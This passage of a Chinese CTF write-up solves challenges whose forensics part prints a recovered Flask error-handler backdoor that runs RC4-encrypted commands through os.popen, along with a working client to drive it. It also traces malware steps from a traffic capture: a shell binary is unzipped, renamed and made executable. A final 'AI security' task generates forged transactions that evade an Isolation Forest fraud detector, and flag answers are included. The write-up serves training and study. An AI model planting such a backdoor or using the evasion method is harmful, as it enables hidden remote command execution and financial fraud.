iG9dkG8nCFfjUlhdTaS1gJ7LFsmUjn8u/vRQbRLw/y66Irr/ynKOCzROcgrnDFxH3z3JTQQpTiDpeyzRsF4SnGBMv5Hbr+cK6YTa4MIbfzj5Ti3FMgJNqgK5Xk9hsilGsU6tUbnp6SKiJhUvJ8bqynUMEzndl+S+OVRCaH2iJl8U3WjyB68Rq4HATk/cK7LkJHHMjC3W7dTmOBpfoWMVELaL+RkqWYv0CpW5qENLlnOPBrGaGNeIZahzbnruEPIIXGkGz1fE5d42MaKZsCUYt1xXiai9+cbKGj/d0lICq7uc7bRhEBx46DyBXTz1gfJnT2ur6x4Avb5wY2pcYrcD2OR6AikMvm2c0bhabJB6o0DhONJ4lCxmKdGBzuwrts1u0D2yuo37yLLfsGDuyepNw8lyTNc2nyhCVBfW23DnBQmWc1QLCoRppVhjKXwOpODKO8R8YHnQM+rLk6EOabCdGK57iRzMcT3wc436kVmHXDcI0ZsYGY5aIC5DbdWjUt2ZuU0LmuLwzCTS99zhOoO8DKNqbK4bINLyAI2X928xib+hmIOqp3oSgC2PdFc8yqthN9S55omtex2xkEe8CY48C6z4JtqVtqhPQWQ8kte6xlepiVYCqIbE2Vg4fN//L/ff/u//9p4Lz7uq46yWenkJ/x90j/5mEIors5McSuFi9dygyyR5wJfuqGhOfsVVwJe'))发现是一串反转Base64,使用
global exc_class
global code
import os,binascii
exc_class, code = app._get_exc_class_and_code(404)
RC4_SECRET = b'v1p3r_5tr1k3_k3y'
def rc4_crypt(data: bytes, key: bytes) -> bytes:
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i]
i = j = 0
res = bytearray()
for char in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
res.append(char ^ S[(S[i] + S[j]) % 256])
return bytes(res)
def backdoor_handler():
if request.headers.get('X-Token-Auth') != '3011aa21232beb7504432bfa90d32779':
return "Error"
enc_hex_cmd = request.form.get('data')
if not enc_hex_cmd:
return ""
try:
enc_cmd = binascii.unhexlify(enc_hex_cmd)
cmd = rc4_crypt(enc_cmd, RC4_SECRET).decode('utf-8', errors='ignore')
output_bytes = getattr(os, 'popen')(cmd).read().encode('utf-8', errors='ignore')
enc_output = rc4_crypt(output_bytes, RC4_SECRET)
return binascii.hexlify(enc_output).decode()
except:
return "Error"
app.error_handler_spec[None][code][exc_class]=lambda error: backdoor_handler()里面的RC4_SECRET就是flag。
FLAG:flag{v1p3r_5tr1k3_k3y}
SnakeBackdoor-4
利用上一问得到的加密脚本,写出解密脚本:
import binascii
RC4_SECRET = b'v1p3r_5tr1k3_k3y'
def rc4_crypt(data: bytes, key: bytes) -> bytes:
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i]
i = j = 0
res = bytearray()
for char in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
res.append(char ^ S[(S[i] + S[j]) % 256])
return bytes(res)
def decrypt_response(enc_hex_response: str) -> str:
enc_response = binascii.unhexlify(enc_hex_response)
decrypted = rc4_crypt(enc_response, RC4_SECRET)
return decrypted.decode('utf-8', errors='ignore')
def encrypt_command(command: str) -> str:
cmd_bytes = command.encode('utf-8')
enc_cmd = rc4_crypt(cmd_bytes, RC4_SECRET)
return binascii.hexlify(enc_cmd).decode()
if __name__ == '__main__':
import sys
if len(sys.argv) < 2:
print("Usage:")
print(" 解密响应: python rc4_decrypt.py -d <hex_data>")
print(" 加密命令: python rc4_decrypt.py -e <command>")
print("\n示例:")
print(" python rc4_decrypt.py -d 48656c6c6f20576f726c64")
print(" python rc4_decrypt.py -e 'ls -la'")
sys.exit(1)
mode = sys.argv[1]
if mode == '-d' and len(sys.argv) >= 3:
enc_hex = sys.argv[2]
try:
decrypted = decrypt_response(enc_hex)
print(f"[+] 解密结果: {decrypted}")
except Exception as e:
print(f"[!] 解密失败: {e}")
elif mode == '-e' and len(sys.argv) >= 3:
command = sys.argv[2]
try:
enc_hex = encrypt_command(command)
print(f"[+] 加密结果: {enc_hex}")
print(f"[+] 完整请求:")
print(f" X-Token-Auth: 3011aa21232beb7504432bfa90d32779")
print(f" data={enc_hex}")
except Exception as e:
print(f"[!] 加密失败: {e}")
else:
print("[!] 错误的参数")
print("Usage:")
print(" 解密响应: python rc4_decrypt.py -d <hex_data>")
print(" 加密命令: python rc4_decrypt.py -e <command>")在tcp流1807发现攻击者上传了文件shell.zip, 下载下来解压发现shell ELF文件,尝试直接提交发现失败,继续看看;
流1813POST的data参数解密后是:unzip -P nf2jd092jd01 -d /tmp /tmp/123.zip得到文件密码,同时发现文件被移动到/tmp,继续看;
流1817解密得到结果:mv /tmp/shell /tmp/python3.13,shell文件被重命名为python3.13,流1825直接chmod +x /tmp/python3.13;流1826/tmp/python3.13可以确定shell木马文件被重命名为python3.13。

AI安全
The Silent Heist
目标
利用已有 1000 条正常交易数据(
public_ledger.csv)训练一个模型或统计分布;生成一批新的交易记录(伪造数据);
保证这些伪造数据:
总金额 > $2,000,000;
被 Isolation Forest 判定为“正常”;
不重复原始数据;
不能是直接复制粘贴原始数据。
加载数据
import pandas as pd
import numpy as np
from sklearn.ensemble import IsolationForest
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
import warnings
warnings.filterwarnings("ignore")
# 假设你已经将 public_ledger.csv 加载到 df 中
df = pd.read_csv("public_ledger.csv")构造 Isolation Forest 模型
# 使用所有特征进行建模
features = [col for col in df.columns if col.startswith('f')]
X = df[features]
# 标准化(Isolation Forest 对尺度敏感)
scaler = StandardScaler()
X_scaled = scaler.fit_transform(X)
# 构建 Isolation Forest 模型
iso_forest = IsolationForest(contamination=0.1, random_state=42)
iso_forest.fit(X_scaled)获取原始数据的异常分数(验证模型)
scores = iso_forest.decision_function(X_scaled)
df['anomaly_score'] = scores
# 查看前几条是否为正常
print(df.head())使用Gaussian Mixture Model (GMM)来建模分布伪造数据生成策略
from sklearn.mixture import GaussianMixture
# 训练 GMM 模型
gmm = GaussianMixture(n_components=5, random_state=42)
gmm.fit(X_scaled)
# 生成新样本
new_samples_scaled = gmm.sample(n_samples=1000)[0]
# 反标准化回原始空间
new_samples = scaler.inverse_transform(new_samples_scaled)生成伪造数据
# 假设你已生成 new_samples(形状为 (1000, 20))
new_df = pd.DataFrame(new_samples, columns=features)
# 设置 feat_0(交易金额)为一个合理的分布(比如正态分布)
mean_amount = df['f0'].mean()
std_amount = df['f0'].std()
new_df['f0'] = np.random.normal(mean_amount, std_amount, 1000)
new_df['f0'] = np.abs(new_df['f0']) # 保证非负
# 保证总金额 > 2,000,000
total_amount = new_df['f0'].sum()
if total_amount < 2000000:
# 调整 feat_0 的值
scale_factor = 2000000 / total_amount
new_df['f0'] *= scale_factor检查是否通过模型判断为“正常”
# 重新标准化
new_samples_scaled = scaler.transform(new_df[features])
# 判断是否为正常
scores = iso_forest.decision_function(new_samples_scaled)
normal_count = (scores > 0).sum()
print(f"伪造数据中被判定为正常的数量:{normal_count} / 1000")输出 CSV 格式
# 转换为 CSV 字符串
csv_output = new_df.to_csv(index=False)
# 附加 EOF
final_output = csv_output + "\nEOF"
# 输出
print(final_output)
FLAG:flag{0e5f4496-ac33-4793-8d53-0f0c45f1283a}